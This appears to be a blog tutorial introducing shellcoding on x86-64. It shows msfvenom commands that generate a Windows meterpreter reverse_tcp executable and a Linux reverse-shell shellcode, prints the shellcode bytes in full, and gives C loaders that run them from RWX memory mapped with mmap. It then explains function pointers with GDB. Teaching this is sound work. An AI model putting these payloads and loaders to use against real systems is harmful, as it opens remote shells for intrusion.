Post

14. Introduction to Shellcoding

14. Introduction to Shellcoding

Shellcoding is the art of writing compact, position-independent machine code that can be injected and executed inside another process. At its core, shellcode is pure machine code — hexadecimal bytes that the CPU executes directly. It’s not a high-level language; there’s no compiler to hold your hand. The name is a bit of a misnomer; it historically referred to code that spawned a shell (like /bin/sh), but now it’s a general term for the payload in an exploit, which could do anything: reverse a shell, add a user, or just call a specific API.

This section explains what shellcode is, why it matters, how to write effective shellcode.

The key challenges are:

  1. It must be self-contained. No linking to external libraries.
  2. It must be position-independent. It doesn’t know where in memory it will live.
  3. It must avoid certain bytes (bad characters). No null bytes (0x00) which would terminate a string copy, and often no newlines (0x0a) or carriage returns (0x0d).

Does size matter?

Yes — and not just historically. Payloads used to have very tight size limits, and even today smaller payloads are easier to hide and more portable. Rather than calling library functions, shellcode typically invokes syscalls (the kernel interface) directly.

Before starting this I highly encourage you to complete the previous posts related to x86-64 assembly.

Shellcode vs. Payload: What’s the Real Difference?

If you’re diving into the world of exploitation, you’ve likely heard the terms “shellcode” and “payload” used, sometimes even interchangeably. While they are closely related, they are not the same thing.

The Analogy: A Military Operation

Think of a cyber attack like a special forces operation:

  • The Payload is the entire mission package. It’s the overall objective: “Infiltrate the enemy base, plant a listening device in the commander’s office, and exfiltrate undetected.” The payload defines the what and the why.
  • The Shellcode is the highly trained commando team itself. They are the self-contained, executable component that carries out the core, technical task. They are the how.

Example: A Metasploit Payload

When you use msfvenom in Metasploit, you are generating a complete payload. For example:

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > malicious.exe

This payload (malicious.exe) contains:

  • The shellcode responsible for creating the reverse TCP connection.
  • A decoder stub to decode the shellcode if encoding was used.
  • All the necessary configuration data (IP, port).
  • Wrapped in an executable format.

Let’s generate Linux shellcode using msfvenom and try to execute it using C. msfvenom is a command-line utility that comes with the Metasploit Framework.

Let’s generate a simple Linux x64 shellcode that creates a reverse TCP shell. This is one of the most common payloads - it will connect back to our machine and give us a shell.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f c

[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of c file: 338 bytes
unsigned char buf[] = 
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97"
"\x48\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6"
"\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
"\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f"
"\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48"
"\x89\xe6\x0f\x05";

Now we need a way to execute this raw machine code. We’ll create a simple C program that places our shellcode in memory and jumps to it.

Let’s create a C file shellcode_loader.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#include <stdio.h>
#include <string.h>

// Our msfvenom-generated shellcode
unsigned char code[] = 
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97"
"\x48\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6"
"\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
"\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f"
"\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48"
"\x89\xe6\x0f\x05";

int main() {
    printf("Shellcode Length: %zu bytes\n", strlen(code));
    
    // Cast the shellcode array to a function pointer and execute
    int (*ret)() = (int(*)())code;
    
    printf("Starting execution...\n");
    ret();
    
    // This line will only be reached if the shellcode fails
    printf("Shellcode execution completed (or failed)\n");
    return 0;
}

When we try to compile this on Modern system it will likely to be failed.

By default, modern systems have security protections that would prevent our shellcode from running. Modern systems use Data Execution Prevention (DEP) or W^X (Write XOR Execute) policy:

  • Memory pages can be either writable OR executable, but not both
  • This prevents attackers from injecting and executing code

We need to use mmap. You can learn more about mmap in my System Programming Series

1
2
3
void *exec_mem = mmap(NULL, sizeof(code), 
                     PROT_READ | PROT_WRITE | PROT_EXEC,  // ← Explicitly requesting EXECUTE permission
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

Using mmap we will allocate new memory region and set its permission explicitly to RWX. The shellcode will be copied to this memory region and then the CPU can execute instructions from this region.

Let’s try to implement this behaviour.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

// Our msfvenom-generated shellcode
unsigned char code[] = 
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97"
"\x48\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6"
"\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
"\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f"
"\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48"
"\x89\xe6\x0f\x05"; // Stored in data section (RW-)


int main() {
    printf("Shellcode Length: %zu bytes\n", strlen(code));
    
    // Allocate executable memory
    void *exec_mem = mmap(NULL, sizeof(code), 
                         PROT_READ | PROT_WRITE | PROT_EXEC,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    
    if (exec_mem == MAP_FAILED) {
        perror("mmap failed");
        return 1;
    }
    
    printf("Allocated executable memory at: %p\n", exec_mem);
    
    // Copy shellcode to executable memory
    memcpy(exec_mem, code, sizeof(code));
    
    printf("Executing shellcode...\n");
    
    /* PROBLEM */
	// int (*ret)() = (int(*)())code;  // Trying to execute data section
	// ret();
      
    // Cast to function pointer and execute
    int (*func)() = (int(*)())exec_mem;
    func();
    
    // Cleanup (though we may not reach this)
    munmap(exec_mem, sizeof(code));
    
    return 0;
}

Let’s revise the Memory Layout once again -

[Text Section]    - EXECUTE permission (your main() code)
[Data Section]    - READ/WRITE permission (your shellcode array)
[Stack]           - READ/WRITE permission
[Heap]            - READ/WRITE permission

If you’re feeling overwhelmed by this line:

1
2
int (*ret)() = (int(*)())code;
ret();

You’re not alone! This syntax might look intimidating at first, but it’s actually quite logical once we break it down.

Think of your shellcode bytes:

1
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f..."

These aren’t just random numbers! Each byte is a CPU instruction that the processor understands directly:

  • \x6a\x29 = push 0x29
  • \x58 = pop rax
  • \x99 = cdq (clear RDX)
  • \x6a\x02 = push 0x2
  • \x5f = pop rdi
  • etc.

To see the complete picture, you can use an online disassembler like Defuse.ca’s Online X86 Assembler and paste your shellcode as a hex string.

First, generate the shellcode in hex format:

1
2
3
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f hex
#...
6a2958996a025f6a015e0f05489748b90200115c7f000001514889e66a105a6a2a580f056a035e48ffce6a21580f0575f66a3b589948bb2f62696e2f736800534889e752574889e60f05

Paste this into the disassembler, and you’ll see the human-readable assembly instructions:

Disassembly:

0:  6a 29                   push   0x29  
2:  58                      pop    rax  
3:  99                      cdq  
4:  6a 02                   push   0x2  
6:  5f                      pop    rdi

This visualization makes it clear: your shellcode is literally a mini-program written directly in machine language, just waiting to be executed!

Let’s look a bit of C that we already know.

1
2
3
4
5
6
7
void hello() {
    printf("Hello World!\n");
}

int main() {
    hello();  // Call the function
}

The function hello() is at some memory address. Calling hello() jumps to that address and executes.

What is a Function Pointer?

1
2
3
4
5
6
7
8
void hello() {
    printf("Hello World!\n");
}

int main() {
    void (*func_ptr)() = hello;  // func_ptr points to hello's address
    func_ptr();  // Calls hello via the pointer
}

Well func_ptr is a variable that holds a memory address. That address points to executable code and func_ptr() jumps to that address and executes.

Let’s try to break this -

1
int (*ret)() = (int(*)())code;

We are declaring a function pointer ret which is basically a pointer to a function. The function returns int and takes any arguments ().

(int(*)())code

  • This is a cast that says: “Treat code as a function pointer”
  • (int(*)()) means “pointer to function returning int”
  • We’re telling the compiler: “I know code is a byte array, but trust me, it’s actually machine code”

Simplified version -

1
2
3
4
5
6
7
8
9
// Before cast: code is an array of bytes
unsigned char code[] = {0x6a, 0x29, 0x58, ...};

// After cast: ret points to the SAME memory, but we're telling 
// the compiler it contains executable code
int (*ret)() = (int(*)())code;

// This generates: call [address of code]
ret();

Sometimes, the best way to understand a concept is to see it working at the lowest level. Let’s debug our function pointer example using GDB to see what’s really happening behind the scenes.

1
2
3
4
5
6
7
8
9
10
#include <stdio.h>

void hello() {
    printf("Hello World!\n");
}

int main() {
    void (*func_ptr)() = hello;  // func_ptr points to hello's address
    func_ptr();  // Calls hello via the pointer
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ gcc -o func_ptr func_ptr.c

gdb ./func_ptr
pwndbg> start
#...
pwndbg> disass main
Dump of assembler code for function main:
   0x0000555555555163 <+0>:	endbr64 
   0x0000555555555167 <+4>:	push   rbp
   0x0000555555555168 <+5>:	mov    rbp,rsp
=> 0x000055555555516b <+8>:	sub    rsp,0x10
   0x000055555555516f <+12>:	lea    rax,[rip+0xffffffffffffffd3]        # 0x555555555149 <hello>
   0x0000555555555176 <+19>:	mov    QWORD PTR [rbp-0x8],rax
   0x000055555555517a <+23>:	mov    rdx,QWORD PTR [rbp-0x8]
   0x000055555555517e <+27>:	mov    eax,0x0
   0x0000555555555183 <+32>:	call   rdx
   0x0000555555555185 <+34>:	mov    eax,0x0
   0x000055555555518a <+39>:	leave  
   0x000055555555518b <+40>:	ret    
End of assembler dump.

Let’s step to the point where the function pointer is called:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
pwndbg> nextcall
#...
pwndbg> disass
Dump of assembler code for function main:
   0x0000555555555163 <+0>:	endbr64 
   0x0000555555555167 <+4>:	push   rbp
   0x0000555555555168 <+5>:	mov    rbp,rsp
   0x000055555555516b <+8>:	sub    rsp,0x10
   0x000055555555516f <+12>:	lea    rax,[rip+0xffffffffffffffd3]        # 0x555555555149 <hello>
   0x0000555555555176 <+19>:	mov    QWORD PTR [rbp-0x8],rax
   0x000055555555517a <+23>:	mov    rdx,QWORD PTR [rbp-0x8]
   0x000055555555517e <+27>:	mov    eax,0x0
=> 0x0000555555555183 <+32>:	call   rdx
   0x0000555555555185 <+34>:	mov    eax,0x0
   0x000055555555518a <+39>:	leave  
   0x000055555555518b <+40>:	ret  

If you try printing the address of hello function you’ll find it to be exactly same as the address stored in rdx.

1
2
3
4
pwndbg> p hello
$1 = {<text variable, no debug info>} 0x555555555149 <hello>
pwndbg> reg rdx
*RDX  0x555555555149 (hello) ◂— endbr64

I hope this makes things clear for you now.

Now in the next part we will deep dive into syscalls.

This post is licensed under CC BY 4.0 by the author.